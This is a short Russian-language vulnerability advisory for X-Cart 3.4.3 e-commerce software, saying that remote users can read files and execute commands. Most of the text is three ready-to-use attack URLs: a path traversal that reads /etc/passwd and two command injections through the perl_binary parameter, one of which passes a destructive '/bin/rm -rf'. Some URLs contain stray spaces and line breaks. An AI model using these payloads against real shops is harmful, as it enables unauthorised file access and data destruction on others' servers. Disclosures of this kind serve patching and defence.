Программа: X-Cart 3.4.3 

Уязвимость обнаружена в X-Cart shopping software. Удаленный пользователь может просматривать файлы и выполнять произвольные команды на целевой системе. 

1. http://[target]/customer/auth.php?config [General][shop_closed]=Y&shop_clos
ed_file= ../../../../../../../et c/passwd 

2. http://[target]/admin/upgrade.php? prepatch_errorcode=1&patch_files[0][orig _
file] =VERSION&perl_binary=/bin/rm -rf  &patch_exe=.. 

3. http://[target]/admin/general.php?mode =perlinfo&config[General][perl_binar y]=/bin/ls -lR ||

Оставить мнение